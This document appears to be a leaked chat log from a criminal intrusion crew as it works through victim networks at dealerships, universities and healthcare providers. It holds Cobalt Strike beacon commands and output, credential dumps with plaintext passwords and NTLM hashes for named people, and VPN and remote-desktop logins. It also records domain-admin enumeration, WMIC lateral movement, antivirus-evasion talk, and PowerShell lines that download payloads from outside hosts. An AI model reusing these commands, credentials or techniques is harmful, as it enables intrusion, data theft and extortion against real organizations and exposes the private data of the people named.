FLSMITH_HD FLSMITH_EQARC FLHOBO_HD FLDOBBS_HD FLDOBBS_EQARC drtest DLR_Shared2 DLR_Shared1 dhsrepo DETAYLOR_HD DETAYLOR_EQARC DealerConfig COMVEQUIPMENT_HD COHONNEN_HD COHONNEN_EQARC channel_enviroment_support CATHOMASON_HD CASANJOAQUIN_EQARC CALAWRENCE_HD CALAWRENCE_EQARC CAFRESNO_HD CAFRESNO_EQARC CACALCOAST_HD CACALCOAST_EQARC c$ ARSWARK_HD ALSUNSOUTH_HD ALSUNSOUTH_EQARC admin$ ``but these cars are NetAppuser7okenet use?``No userpod normal what do you mean? and user7 here too check the validity of the cradag....... ``` beacon> shell dir \\172.31.190.100\C$\ProgramData [*] Tasked beacon to run: dir \\172.31.190.100\C$\ProgramData [+] host called home, sent: 66 bytes [+] received output: Access is denied. beacon> shell dir \\172.31.190.101\C$\ProgramData [*] Tasked beacon to run: dir \\172.31.190.101\C$\ProgramData [+] host called home, sent: 66 bytes [+] received output: Access is denied. beacon> shell dir \\172.31.190.102\C$\ProgramData [*] Tasked beacon to run: dir \\172.31.190.102\C$\ProgramData [+] host called home, sent: 66 bytes [+] received output: Access is denied. `````` 172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN) 172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN) 172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN) `````` [+] 172.31.190.100:445 - 172.31.190.100:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator [+] 172.31.190.101:445 - 172.31.190.101:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator [+] 172.31.190.102:445 - 172.31.190.102:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator ``On a subnet with DK polzak on three machines admin, I'll try to knock, maybe there YES passed by@tl1 ``` 10.51.128.122:25 (220 10.51.128.122 ESMTP Sendmail 8.14.3/8.14.3; Fri, 23 Oct 2020 15:53:27 -0500) 10.51.128.122:21 (220 (vsFTPd 2.2.2)) ``` any idea what to post here? 
on vsFTPd only vsftpd_234_backdoor didn't work with 2.2.2 on SMTP not quite figured out with enum, there user_file is taken from local machine, but why it is taken - is not clear, in idea it must deduce users, which rotate there, and not check with entered by me, no? smtp_ntlm_domain just works without output for relay session in the msf need, but how to drop it there - no idea, 445 open, but the same dir says type network name not found On webmords interesting found Avaya, tried knocking there with nddevbernst codes - did not work, with those above, from webroot - stood for about 20 minutes and I turned it off, so it did not show anything It won't let me into the ciski, it just won't load. [+] 10.51.128.199:445 - 10.51.128.199:445 - Success: 'JDOSSN\nddevbernst:Tractor20! `` * Username : nddevbernst * Domain : JDOSSN * NTLM : 5b622ad5d550408ed6260c2b8fb185cc Result: Tractor20!>sAMAccountName: nddevkodell ``` >memberOf: CN=NDLEADING_ISG,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_SALES,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_EQUIPRDB-SALES-RENTAL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local >memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local ``Kevin O'Dell d33r31 !Well deactivated ) ``` User name svc_BuildAutomator Full Name EQBuildAutomator Comment User's comment Country/region code 000 (System Default) Account active No Account expires Never Password last set 10/20/2020 9:13:16 PM Password expires Never Password 
changeable 10/21/2020 9:13:16 PM ``and on those who ``were'' as well. User name svc_snow_preprod Full Name Service Now PreProd Comment Service Now Preprod User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/19/2020 7:38:46 AM ``YeahPassword last set 10/21/2020 4:26:58 AM They probably got wind of it a couple days ago they changed the passwords and removed most of the danes didn't fit the passwords that were in the beginning try to these accounts I built in the beginning`` beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain jdossn.local. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- DHSAdmin jdodmp_svc The command completed successfully. ``It gave me a different result, it's strange`` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- a900221 AuditDB_svc AuditJDOSSNDA DHSAdmin jdodmp_svc MPXAXDAgentAccount PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom svc_audit svc_BuildAutomator svc_exchange svc_OMAA svc_OMDAS svc_OMREAD svc_scomsql_2019 svc_snow_preprod The command completed successfully. 
UserName : jdodmp_svc ComputerName : JDODC67.jdossn.local SessionFrom : 204.54.154.136 SessionFromName : JDODMP03.jdossn.local LocalAdmin : False Well, the two domains admins)))) but fucking there are two:D so they took it, I say not ask for it the password was set by some network admin it's LA passwords now we'll check it on all domains admins sure sure) ok yes Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee::: ``didn't understand the question I was admin sure is it worth it? try jeremstew@gmx.com 1Qwerty1:::seclold I'm now with my card or you have an account without balance? there Purchase button should be there are credits on the accountpurchasevoneaFound.But this is a payment record. Purchase Get free credits on all? no one has been disconnected? Please wait up to 5 days. A notification email will be sent to youprost how many I've been there - always no luck):man_shrugging: )and why not check ?there by the way their passwords that are in hashes on kmd5 do not work? it's unlikely domain pass... but you could try it. https://www.gotomeeting.com/meeting/sign-in Presenter Login: blainee@leadingedgeequip.com Password: NDleading2020$ ``no see liku look in citrix 2fatam 2faon there's an admin? o_o where is that from? ``` --- Chromium Credential (User: ndmicjsater) --- URL : https://my.webrootanywhere.com/default.aspx Username : jasons@leadingedgeequip.com Password : jsateren8726 ``and cisco netswich did open)``and cisco opens on https? https://10.51.128.5 Cisco ASDM 7.1(2)ugh the fucking cloud karocha on it netapp is vindanas? 
ah, well where it LA there `>operatingSystem: NetApp Release 8.3.2P7 `` I'll look it up straight "it" Well, I wrote above that there are on the servers LA, but he does not see the fs why then and that mmm for cars for between the chair and the monitor an empty coconut hangs on-call-aspects because they for techportaok, will dotakaya acke on the servers almost never rbaotayuta not on the servers?to the servers, all - and this is what they brute-force available hosts from other segments? but i doubt that someone outside this segment(hmDa like yes, HP kinda lets in on the proxei switches are all mfu's? I don't know the models by eye so) MFPs? 10.51.128.171 WORKGROUP\HPFEA60E [Win] 10.51.128.149 00-00-00-00-00 WORKGROUP\HPC67872 [Win] 10.51.128.122 00-80-91-CE-12-74 MFP13505140 [Win] 10.51.128.82 FC-3F-DB-4D-76-CB NPI4D76CB [Win?] 10.51.128.84 44-1E-A1-33-BA-C1 NPI33BAC1 [Win?] do these hosts say anything? on the workgroups try the local admin they have here on the network You can also try to use your users... if it will let though unlikely some unknown cisco10.51.128.5 7C-69-F6-E6-2D-C1 [SSH-1.99-Cisco-1.25]you can set on brute force if lockout will not directly hydra under sockets on webforum try to web on switch admin/admin admin/password i used a similar garbage and it didn't work for me) do you use it? https://github.com/k8gege/Ladon they create the domains I guess... 
10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] 10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] ``` switches...`` 10.51.128.83 [NPIF68328] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401dne 10.51.128.83] 10.51.128.84 [NPI33BAC1] [Virata-EmWeb/R6_2_1] [HP LaserJet P2055dn 10.51.128.84] 10.51.128.3 [ ] [Gateway] [AT&T VPN Gateway] 10.51.128.10 [ ] [] [] [+] received output: 10.51.128.62 [ ] [Embedthis-Appweb/3.4.2] [] 10.51.128.61 [ ] [HTTPD] [Web managerment Home] 10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] 10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A] [+] received output: 10.51.128.144 [DESKTOP-CGJQ23A.ndleading.jdossn.local] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401n 10.51.128.144] 10.51.128.122 [MFP13505140] [Apache] [TopAccess--> ``but before it dies:``doesn't say anything-what do you mean by exporting? Backup is disabled is it sad that they didn't get it up? although it's more about the AV base something from Fortinet ``` SerialNumber=FPT-FCS-DELL0000|Address=173.243.138.108:443|FDNListener=|TimeZone=0|AddrIPv6= SerialNumber=FPT-FCS-DELL0008|Address=173.243.138.98:443|FDNListener=|TimeZone=-5|AddrIPv6= SerialNumber=FPT-FCS-DELL0009|Address=173.243.138.99:443|FDNListener=|TimeZone=-8|AddrIPv6= SerialNumber=FPT-FCS-DELL0010|Address=96.45.33.105:443|FDNListener=|TimeZone=-5|AddrIPv6= SerialNumber=FPT-FCS-DELL0011|Address=96.45.33.106:443|FDNListener=|TimeZone=-5|AddrIPv6= ``Waiting for data ``Powerpick Invoke-Inveigh -Kerberos -FileOutput Y "C:\Users\mercedesd\AppData\Local\Microsoft\eula.txt"``Well, most likely his domain already known creeds can safely connect to VPN and see the domain 9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd 3144 4772 FortiWF.exe x64 0 NT AUTHORITY\SYSTEM 1424 4772 FortiProxy.exe x64 0 NT AUTHORITY\SYSTEM `` 1424 4772 FortiProxy.exe 3144 4772 FortiWF.exe 6412 4772 FCDBLog.exe 6428 4772 fcappdb.exe 7100 4772 
FortiESNAC.exe 7108 4772 FortiSSLVPNdaemon.exe 7116 4772 FortiSettings.exe 9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd 11900 4772 fortifws.exe 18236 4772 fmon.exe beacon> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain matches.com. System error 1355 has occurred. The specified domain either does not exist or could not be contacted. ``Session returned http://docs.fortinet.com/document/forticlient/6.0.0/configurator-tool/823336/use-forticlient-configurator-tool-tool-for-windows https://kb.fortinet.com/kb/documentLink.do?externalID=FD44157 https://kb.fortinet.com/kb/documentLink.do?externalID=FD48788 which leads to the domain``` Description . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30) ``` you can search for fortikgat config of the VPN `` TCP 192.168.0.17:65182 SkyRouter:5431 ``sessions are not present - VPN is probably switched off so you can see the domain if you get the output from the "domain admins" /dom check that the domain is visible Machine is not part of domain - exit. ``From the system. ``` beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Machine is not part of domain - exit. ``` From user ``` beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Processing files in \\MATCHES.COM\sysvol\MATCHES.COM\policies\. [-] Invoke_3 on EntryPoint failed. Did you check if the domain is visible at all? Maybe there's a VPN disconnected from the domain )-Lists DK, yes? 
`` beacon> execute-assembly SharpView.exe Get-Domain [*] Tasked beacon to run .NET program: SharpView.exe Get-Domain [+] host called home, sent: 841791 bytes [+] received output: An error occurred: 'System.IndexOutOfRangeException: Index was outside the bounds of the array. at SharpView.Program.Run(String[] args) at SharpView.Program.Main(String[] args)' ``it didn't work you forgot to put adfind here, please, for the sake of argument) you can poke the formatting in #general as an example ``Target : outlook.office365.com Comment : SspiPfc UserName : Mercedes.Dinhamgrant@matchesfashion.com Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 13/03/2020 12:22:01 Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com UserName : Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 08/09/2020 16:02:18` ``` Target : outlook.office365.com Comment : SspiPfc UserName : Mercedes.Dinhamgrant@matchesfashion.com Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 13/03/2020 12:22:01 Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com UserName : Password : Dinham1989 CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 08/09/2020 16:02:18 There's also a one-line formatting like ``marker``@user1 tell me how to format please the rest of usSo, drop in here the information you gathered, passwords found, ad info, sitbelt, and so on and continue 
work)eyJhbGciOiJB/360fJkwH4TQ6LODerkkb4TlbN0v/Zt5aK/BgoHABZb9CbTBU3YnjStc++ipt5xVxC+bbWj9EfCyMO1Z5+fFCt0TfdobT1dxN5hHr0SDk4Rv7YC7Ec2pFnt2aJsnJe9qk1T94PiNEQlmEAdKnkZq7glGAwZJeKgPCC7wLVY7OcU7+1Yn8ImX9o1DFMTAlVNwbhEgqNqQXaLOSn9/wpqySw==eyJhbGciOiJBxX2bvj2LLTDwhlBvieTlwrBkhX8ngIKIjBaetx8b1L/oWGkAX4QsbLWvPMO41Aw2FSqiJDsRumji0Vmlft5Jgu7mg/OQFau3h9PfdTZ4Z3bIrwbEKOouwr/RPgBVkFcdVrJoHJfebtGcRDUERbP0xYY5h1On7UYvrZzCUgWoYun0y7Hfd4vL7IbhDeP4h1yCRtyr+PJdF50UpZHPyJ4MCqYcUR9FiLMdZKXlS5eLx/vjVtpsGmwsbwJr13y/zpJGhVES0NyQoufK0lHF2X3riZXCeJLUYPnOOloPTv29n09YaPK6AuyehhCps925u7+mguikxaAxoyu99/BgirSOn60Ib73IHmpqNRFCnaMZZdw=eyJhbGciOiJBhFASKtrWS+mJFYNHEP7Z180TrNSuIruXJJ3m95kV4Z427KwnBGG5q44CwZZPMbh4hlnOHWuS8YF6xNGlxux9dwzxxqafgfvGCw8ycjgVNBVz5rf3tOtMJDjKOnNlQ1I7xxU3vBkHaW28kfkexpo0T9pKy8kN2AA088uri1tP84o=eyJhbGciOiJBu2oE1WMxl3Y59WYGluxRGl7vvKhmiwcAQgbXMj4+dYTHX2EgtD8Demco+OMkNmtVcLSrQjjE5LgyuIbtMhjV9JgKVqfFHeGJ+ixD3JlwPOstgei1xUltazxNKJNlYJUVIyhjSlZ8nvP08+xulm+mbrp9nmYM8pEeCUmE92t3/VU=otuser8tl2eyJhbGciOiJBI4OZkrnV7D96S EA's creeds are found, attempts are being made to sneak into the trusts to continue work10.10.30.24 what is Z? C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$ ""WH20s.admin 1225kofq"" /user:lrhc.local\svc-aadc > C:\ProgramData\nts.txt && copy C:\ProgramData\nts.txt \\10.10.30.24\C$\ProgramData\nts.txt" Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 3428; ReturnValue = 0; }; C:\Users\wevvewe\Desktop>dir Z:\ProgramData\nts.txt Volume in drive Z has no label. Volume Serial Number is 584E-4F0A Directory of Z:\ProgramData 12/15/2020 12:48 PM 0 nts.txt 1 File(s) 0 bytes 0 Dir(s) 4,098,580,480 bytes free Can't you do a no-jouz with a direct quote and output it to a file so you don't have to do magic? 
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use > C:\ProgramData\eula_en.txt && copy C:\ProgramData\eula_un.txt \\10.10.30.24\C$\ProgramData\eula_en.txt" Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 5588; ReturnValue = 0; }; ``` ``` C:\Users\wevvewe\Desktop>type Z:\ProgramData\eula_en.txt New connections will be remembered. There are no entries in the list. `````` C:\Users\wevvewe\Desktop>wmic /node:10. 10.30. 24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$" Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 7036; ReturnValue = 0; }; ``Then password) will it be like this? Write the ip like this ``10. 10.30. 24`` C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc"/password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$" ERROR: Description = Access is denied. ``He gave me different commands with quotes, take the username polzakastop C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user:lrhc.local\svc-aadc /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$" ``I don't know my name is ``wanga''? Invalid Global Switch. Try the second one from the internal car with wmik and it's the same problem I had a problem with trust, it's not a problem at all, I thought maybe the output was wrong, it's a password with a space, compare it with a space))) it's not clear if it's with a space or what Username Domain Password -------- ------ -------- svc-aadc lrhc.local WH20s.admin 1225kofq ``` it's fucking stinky not found so fuckin' send me the hash and I'll give you the clearance. 
all right, to see the clearance you have to buy the check for free. now it's no fun who was logged in. we all got kicked out of the account so you changed your usernames and passwords. write 5.com how do I check hash from kmd? it's like 0...I would dal no yuz check it out can you give me a file with cleartexts from ntds? I want to check I do not understand what you're doing) this hash will eat? https://github.com/InfosecMatter/Minimalistic-offensive-security-tools/blob/master/smblogin.ps1 yeah, and how to download the hashes without a coba?) and stop shahesh what exactly do you want to download? so you downloaded? here they are EA with hashes of all collected and accidentally sent i threw the name + hash EA and did not understand what you threw) it's not all shaobl``` lrhc.org\PsService 327db612d1d53ac8477a49ae667d523c lrhc.org\Pssupport01 8c3c72c186ece567004a620aff55d842 lrhc.org\svc-aadc a5ed4977ab742434bd35761f3cb4c028 lrhc.org\TMSXE.Service01 a6aea38d860ac5c1e980a7724bd0362e lrhc.org\UCAdmin 1c7c0878a380b6e004f97cd62af6398b lrhc.org\frsecure 6888441821d91affeb5f8cad8a6cad7b lrhc.org\Psupport 8c3c72c186ece567004a620aff55d842 lrhc.org\tms01 a6aea38d860ac5c1e980a7724bd0362e lrhc.org\jyrkwa ce52742a372f62d7100e9ca7b5f13369 ``If you find the hash, I'll give you the clearance pass from EA? 
dn:CN=ffmg.local,CN=System,DC=lrhc,DC=local >whenCreated:2010/01/18-12:49:34 Central Standard Time >name: ffmg.local >securityIdentifier: S-1-5-21-111134195-3807604873-3122732003 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ffmg.local >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=mcklrh.mig,CN=System,DC=lrhc,DC=local >whenCreated: 2018/02/14-17:38:43 Central Standard Time >name: mcklrh.mig >securityIdentifier: S-1-5-21-2653265968-1271411615-963851744 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: mcklrh.mig >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=ELEAH.LOCAL,CN=System,DC=lrhc,DC=local >whenCreated: 2020/09/16-17:04:40 Central Standard Time >name: ELEAH.LOCAL >securityIdentifier: S-1-5-21-2327498286-4212857632-543316630 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ELEAH.LOCAL >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] ``There are 3 trusts, 1 in quarantine, I don't touch it, it turns out? Force user logoff how long after time expires?: Never Minimum password age (days): 0 Maximum password age (days): 90 Minimum password length: 8 Length of password history maintained: 10 Lockout threshold: 10 Lockout duration (minutes): 30 Lockout observation window (minutes): 30 Computer role: PRIMARY The command completed successfully. `````` Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator frsecure jyrkwa PsService PsSupport Pssupport01 svc-aadc tms01 TMSXE.Service01 UCAdmin The command completed successfully. 
`````` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- admin Administrator AvamarBackupUser CDW.Tech1 CDW.Tech2 CDW.Tech3 cdw.user01 cisadmin frsecure gsnelson jyrkwa lljennbi nmsapps OnPremMigAdmin1 OnPremMigAdmin2 OnPremMigAdmin3 pmpetecc PRHADMIN PsService PsSupport Pssupport01 radmin tms01 TMSXE.Service01 UCAdmin WebAdmin The command completed successfully. ``Postpone in the confines of the progress+new session in the input coba, by the requests of those waiting for the sessionAccess to the admin+there look for admin in the AV? What is in the work now? Good afternoonMorning in the hut. i'll get it today thank youactivated his account back = )ah man sec I'll look now) He wanted to go, they did not let him go) Looks like someone closed access.so stop and he does not have? stupid here where to give access user8Hi! https://helpdocpt.club/ have you already copied messages?) you just order the build.))but good night, until tomorrow night, until tomorrow we will close even by 6, most likely delayed until 2-3 nights tomorrow by 5 in general, that's the case if you do not interfere with AV describe what you did on the result is lazy) you settled on kerbenichego from this did not try, I will try to see, and what passes to try? i have a list of only 4-skul, zero, smbgost ?i have tried on all the cars to raise the rights, nowhere succeeded, under this type of creeds do not knock anywhere else, and the other polzak only in hashes rubeus, still waiting for them on all labs i.e. you have where to go? everything in the confedaad and other things is there? if the kerb is unbroken, you can further untwist there are places to work? 
on all machines (virtual labs) authorized under it (some sessions have hung, if you need to restore them) there are not up all eleveite in kobe tried there is where to dig?#humboldt-edu is the one where the user can only go to the virtual labs, AB there vindefostaet in your work then through tpsh you can remove hell and kerbs and other it and killed it after loading? I went to rdp, ran kmd, in it ran your one-time command, went to tpsh, figured out the interface, wanted in cobalt dll, ran the attached string and got no response I didn't get it off. Didn't get a response from AB. Didn't have time to try anything at all The session in tpsh just died ``` (New-Object System.Net.WebClient).DownloadFile('http://199.127.61.166:8080/A3z4km1/x64.dll', 'C:\Users\Healdton.IT\x64.dll') ``Minute@user7 av which? stop, this other one can't pull anywhere, AV breaks everything, user not LA but with a different way of loading? https://vlab.humboldt.edu/rdweb/webclient/ ``` @user7 here we have what? flew, after a short time - flew away tpsh come and go? by stg? yes, marked the second one you gave - the creeds did not fit in tpsh this was `` https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx ``` is this one in your work? are the accesses working? so i need to re-save it@user8 then you still have work to do with it that's all i did outside the domain, i didn't pull it i wanted a dll in cobalt, ran the download in tps and no response did you pull the kerb? not working on it yet, i can't see what else can be done with it work with ttps://lab.devry.edu/vpn/index.html have you got it working? only 1 subnet is visible, there polozaki@user8 there are 2 questions to you by the story vectors were not identified? have you tried different software dll load? 
i worked with the first one less than 10 minutes on the dedik under wpn no cracks. Checked the network at ms17\bluekeeper\smbghost and nothing. was the last option to find a dc and outside the domain to put a zerologon, but dc I have not found what? do not know `` https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx ``` @user8 what do we have here? https://vpn.floridapoly.edu ``` also a question for you, what's up with you? okay, you wrote off her status, she's in the works I'm up to my neck in it It's only possible to work with her through msf even if i somehow miraculously get up to yes, then i do not know what to do at the stage of crypto) you have a working network? @user9nothing but vindef? another thing `https://ra.vdi.stevens.edu/vpn/index.html` no way to upload the load (coba/msf). Neither as an exe nor as a dll. I've uploaded via powershell and chrome. Everything chops vindef (notifications pop up)without a step asidewrite status on this gridno jump the topic) not a word about it so we are not about sisdbitdef in sisd.peta bitdef where? here only vindef but evil as hell - kills everything at the download stage, or launch in case of psh it chops cob, msf, psh dlls?@user4 you have a bitdef from the point of entry one by one you've confused me)and in the last one only vindef, well I have BitDefendernu apparently dai @user4 maccafi and you? everywhere macaficakoy av? through msfdllku can try to put thereada here does not work tpsh, I do not think that there and work if you throw through psec command load in tpsh? tried windows/smb/psexec with these creds, the session dies ``So if there is a pass to the other PCs why did not go there? 
no, the list and a third of the list did not pass) tried windows/smb/psexec with these creds, the session dies, and the admins(LA\DA\EA)` i.e. hash yes? ``has hash LA, fits to several computers,`` what's there to brute-force? nothing but macafee? it's like they have some kind of iron that filters traffic...macafee similarly what av? dies right away psh? have a system, session in msf i can't get a session in both coba and armia (different ports, pailoats) b in armia dies right away and will not reach coba hash LA, fits to several computers, but the session dies when brute force (goes through a list of 40 pieces), proxy msf some unstable (rotate more precisely) took off yes, and admins (LA\DA\EA) dll coba, dll msf. chopped at the stage of downloading all - what? all chopped by vindexhttp://ra.vdi.stevens.edu/vpn/index.html @user4 what's up? ready@user9 https://lab.devry.edu/vpn/index.html what do we have here? and in order clean the sessions and in slip we finish then half an hour a little meeting and summarize the results of the week another half hourTo what time today? to the coba not at all in the arma immediately fall off different load ports and so on... i'm busy with mine i'm trying to get somewhere from msf i tried both coba and arma to throw a session - does not come in any wayNo software i left on the forum so far only guides for gui looking for how to bitdefender chop upa lot of you without a job?Who are you asking? Are you still sitting idle? 
Well, the first domain (`tcph.stg-healthcare.com`) in tpsh fell off, the second (`signature-healthcare.org`) - citra creed is not true so how are you doing there?if no one's writing anything like that, I won't even write about it here + your colleagues might have written it down - I won't repeat it to you - I already wrote it down, I'll go ask him google second domain@user8 ``` https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears ?where's the psh history file ?okzamenapz or can i help someone ?okpoka postponement)it's a one time thing i want a nickname, too ? powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANAA4AHgAQQBlAEUAeQBaAHcAcgBGAGUAeABaADMAYQBWAHcAUgAzAHkASQBzADkASQBNAEcAOQBRADkATQBBAE0AZQBvADUASABWAGkARgAnACkAKQA7AA== ``Why is it the one you threw me off thepunks hoyrebytes give a one-time load the same command ?try tpshmmhom the alerts popped up that the dll worked successfully what is the sonar ?and kmd aksess fucking danila i can't get it in the kobe either so i don't use the load so it's always dirty `powershell -nop -w hidden -encodedcommand` dacobs? bicon in verashell format? well the one my colleagues tell me about :confused:i'm scared to ask what psh? hz in sisd dll blocked and psh work out if the psh load was fud why do we all dll updateable?and a follow up question so let your colleagues tell me about coba load in psh format) i'm already getting tired of repeatingpoverschel bicon what load? load, there is nothing but windef. and notifications pop upwhat is windef blocking? 
is windef blocking dll, wind is blocking windef, cmd is disabled by admin[ ](https://mediaeveryone.if you're not sure if vindef is blocking vindef,vindef is blocking dll,cmd is disabled by admin[ ](https://mediaeveryone.com/channel/general?msg=kXZRFtHSaMXjss6iw com/channel/general?msg=s2NX4qeezS7ze9vXQ) I[ ](https://mediaeveryone.com/channel/general?msg=kXZRFtHSaMXjss6iw) takelocham is not just using dll,just for the record, the coba load in psh format has been stolen and not cleaned and everything through verashell session to the coba,why download something and it can download files?it will not be easier to download a file? so why do you need to download a file in coba in a minute through psh and start downloading it in coba or you can immediately prepare a file in tpshzagi look what if it is empty now?[ ](https://mediaeveryone.com/channel/general?msg=wSoB94aWyKrhDgP3c) tsepvpvrzablitet 3 pieces https://ra.vdi.stevens.edu/vpn/index.html amueller Lokifredd3133! `````` https://remote.egr.msu.edu/rdweb/pages/en-us/login.aspx nguye680 Thewolf1901 `````` https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx healdton.it@stg-healthcare.com Oklahoma@2020! ``I think all 3 are free? Let's move onACADEMIC.NET no?[ ](https://mediaeveryone.com/channel/general?msg=yJF88nF88qByMt9Jd) Took LA\DA\Ea off, hell. 
I got the system up, but I can't get it to work in the coboo (80, 8080 ports with http lisener) and I opened 443 port and no session will come in ``History of my migration between domains I opened a session with the rights `System` opened the list of processes and logged in to the administrator, took a list of hosts on the other domain and through the command `shell dir \\\[ip]\C$\Users` tried to determine where authorized was the DA, seeing that the list of directories is and filled dll through vmik run, at first (Friday) process runs but session did not come, today I tried again with re-criticized dll and session came, but then as usual hashdump + mimic and try to jump on the DC, all end, go away `SDFJ*H97yW*EFG7ysaEy9F*&sg8$ef84` update tulchanok, then work out so in work now?1 wait for us all came? i only change the names, logins will remain the old names i think this moment has comeDa[ ](https://mediaeveryone.com/channel/general?msg=yJF88nF88qByMt9Jd) what was it? port? and the network is also user3 me - ttps://lab.devry.edu/vpn/index.html i tried to do it in the msf session (no cobu), i will try to move on with the second half of the day, i will give more net@user4 the first half of the day look for AV panel, search for technicians@user9 more specifics we have 3 networks in operation now in the sisd.k12 no approaches found. and in sisd.net if you don't take into account avers - everything seems to be readyTry new cresDetermine first what's done, what's being done, what's plannedWhat's the plan? ``` Administrator::.::F6F8AB934AB58AF9F64ABA9F742E52FB:0101000000000000003D92367296D60153E3AC54F3702C9F 00000000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E00540 0450052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006E 00740065007200320007000800D8B23E357296D6010000000000000000 ``a, okeyhash here)`` yes here it is, above. this is what invei caught the format what? 
